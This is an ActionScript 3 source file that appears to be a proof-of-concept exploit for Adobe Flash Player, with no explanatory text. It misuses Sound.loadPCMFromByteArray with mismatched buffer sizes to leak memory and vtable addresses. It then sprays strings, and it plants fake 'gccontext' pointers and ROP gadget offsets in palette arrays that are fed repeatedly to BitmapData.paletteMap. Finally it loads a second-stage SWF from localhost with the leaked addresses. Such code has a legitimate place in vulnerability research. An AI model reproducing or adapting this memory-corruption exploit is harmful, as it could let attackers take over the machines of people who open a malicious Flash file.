package
|
|
{
|
//import authoring;
|
import flash.display.BitmapData;
|
import flash.display.Sprite;
|
import flash.events.Event;
|
import flash.geom.Point;
|
import flash.geom.Rectangle;
|
import flash.globalization.LocaleID;
|
import flash.media.Sound;
|
import flash.net.URLRequest;
|
import flash.text.TextField;
|
import flash.utils.ByteArray;
|
import flash.display.Loader;
|
import flash.system.Security;
|
import flash.external.ExternalInterface;
|
|
public class soundPCM extends Sprite
|
{
|
//public var s2;
|
public function soundPCM()
|
{
|
|
Security.allowDomain("*");
|
var s = new Sound();
|
var b = new ByteArray();
|
for( var i = 0; i < 504*4; i++){
|
b.writeByte(1);
|
}
|
b.position = 0;
|
s.loadPCMFromByteArray(b, 504, "float", false, 44100.0);
|
var c = new ByteArray();
|
for(var i = 0; i < 1010; i++){
|
c.writeByte(1);
|
}
|
c.position = 0;
|
try{
|
s.loadPCMFromByteArray(c, 504, "float", false, 44000.0);
|
}catch(e:Error){
|
trace(e.message);
|
}
|
|
var d = new ByteArray();
|
s.extract(d, 32, 0);
|
d.position = 0;
|
var t:TextField = new TextField();
|
var lb = 0;
|
var vtable = [];
|
try{
|
while(true){
|
|
var n = d.readFloat() * 32768.0;
|
if (n < 0)
|
n = n + 0x10000;
|
t.text = t.text + n.toString(16);
|
t.text = t.text + " ";
|
if(lb % 4 == 3){
|
t.text = t.text + "\r\n";
|
}
|
|
lb++;
|
if(lb == 17){
|
vtable[0] = n;
|
|
}
|
if(lb == 18){
|
vtable[1] = n;
|
|
}
|
if(lb == 19){
|
vtable[2] = n;
|
|
}
|
|
if(lb == 20){
|
break;
|
|
}
|
|
|
}
|
}catch(e){
|
|
}
|
|
|
t.width = t.height = 3000;
|
|
t.text = "vtable" + vtable[2].toString(16)+ " " +vtable[1].toString(16) + " " + vtable[0].toString(16);
|
addChild(t);
|
var vstr = "";//"i am a temp string, oh yes i am, oh yes i am 324833241832418074384328097234803248907248902434034870330872079483";//"123412341234" + String.fromCharCode(vtable[0], vtable[1], vtable[2], 0);
|
for(var si = 0; si < 4095; si++){
|
|
vstr = vstr + "A";
|
|
}
|
var v:Vector.<String> = new Vector.<String>();
|
for(var q = 0; q < 100; q++){
|
v.push(vstr);
|
|
|
}
|
|
|
|
var s2 = new Sound();
|
var b2 = new ByteArray();
|
for( var i = 0; i < 202*4; i++){
|
b2.writeByte(1);
|
}
|
b2.position = 0;
|
s2.loadPCMFromByteArray(b2, 202, "float", false, 44100.0);
|
var c2 = new ByteArray();
|
for(var i = 0; i < 302*2+2; i++){
|
c2.writeByte(1);
|
}
|
c2.position = 0;
|
|
|
|
try{
|
s2.loadPCMFromByteArray(c2, 302, "float", false, 44100.0);
|
}catch(e:Error){
|
trace(e.message);
|
}
|
|
LocaleID.determinePreferredLocales(v, v);
|
|
|
var d2 = new ByteArray();
|
s2.extract(d2, 202, 0);
|
d2.position = 0;
|
var buf = [0, 0, 0, 0]
|
try{
|
while(true){
|
|
var n = d2.readFloat() * 32768.0;
|
if (n < 0)
|
n = n + 0x10000;
|
t.text = t.text + n.toString(16);
|
t.text = t.text + " ";
|
if(lb % 16 == 15){
|
t.text = t.text + "\n";
|
}
|
|
lb++;
|
|
buf[0] = buf[1];
|
buf[1] = buf[2];
|
buf[2] = buf[3];
|
buf[3] = n;
|
|
}
|
}catch(e){
|
|
}
|
|
|
var bmp:BitmapData = new BitmapData(10, 10, true, 10);
|
var rect:Rectangle = new Rectangle(0, 0, 10, 10);
|
var dp:Point = new Point(5, 5);
|
var ra = [];
|
var ba = [];
|
var ga = [];
|
var aa = [];
|
for(var ai = 0; ai < 256; ai++){
|
ra[ai] = 0x77770000 + ai;
|
ba[ai] = 0x99990000 + ai;
|
ga[ai] = 0x88880000 + ai;
|
aa[ai] = 0x66660000 + ai;
|
|
}
|
|
ra[3] = buf[2]; //gccontext
|
ra[2] = (buf[1] * 0x10000) + buf[0] + 256*4; //gccontext
|
ba[0xcd] = buf[2]; //gccontext
|
ba[0xcc] = (buf[1] * 0x10000) + buf[0] + 512*4; //gccontext
|
aa[0x87] = buf[2]; //gccontext
|
aa[0x86] = (buf[1] * 0x10000) + buf[0] + 256*4; //gccontext
|
ra[0x15] = buf[2]; //gccontext
|
ra[0x14] = (buf[1] * 0x10000) + buf[0] + 256*4 + 0x20; //gccontext
|
ga[0x5b] = buf[2]; //gccontext
|
ga[0x5a] = (buf[1] * 0x10000) + buf[0] + 256*4 + 0x200; //gccontext
|
ra[1] = buf[2]; //gccontext
|
ra[0] = (buf[1] * 0x10000) + buf[0] + 0x40*4; //gccontext
|
ra[0x49] = vtable[2];
|
ra[0x48] = (vtable[1] * 0x10000) + vtable[0] - 5766910; //- 5269070; //rdi to rax gadget
|
ra[0x40] = 0x78656867;
|
ra[0x41] = 0;
|
ra[0x51] = vtable[2];
|
ra[0x50] = (vtable[1] * 0x10000) + vtable[0] - 11965100; //- 11031964;
|
|
ra[0x4b] = vtable[2];
|
ra[0x4a] = (vtable[1] * 0x10000) + vtable[0] - 11965100; //- 11031964;
|
|
|
aa[255] = new killer(); // prevent array free
|
for (var times = 0; times < 5000; times++){
|
try{
|
bmp.paletteMap(bmp,rect, dp, ra, ga, ba, aa);
|
}catch(e:Error){
|
|
trace(e.message);
|
|
}
|
|
}
|
function startListener (e:Event):void{
|
t.text = "Loading Completed";
|
var ldr2:Loader = new Loader();
|
var url2:String = "http://127.0.0.1/ucrasher49.swf?a=" + buf[2] + "&b=" + buf[1] + "&c=" + buf[0] + "&num=14";
|
var urlReq2:URLRequest = new URLRequest(url2);
|
//ldr.contentLoaderInfo.addEventListener(Event.COMPLETE, startListener);
|
ldr2.load(urlReq2);
|
addChild(ldr2);
|
}
|
|
|
var bstr = buf[2].toString(16) + " " + buf[1].toString(16) + " " +buf[0].toString(16);
|
t.text = bstr + "\r\n vtable " + vtable[2].toString(16)+ " " +vtable[1].toString(16) + " " + vtable[0].toString(16);
|
var url:String = "http://127.0.0.1/ucrasher49.swf?a=" + buf[2] + "&b=" + buf[1] + "&c=" + (buf[0] + 6) + "&num=";
|
ExternalInterface.call("sendToJavaScript", url);
|
|
|
|
}
|
}
|
}
|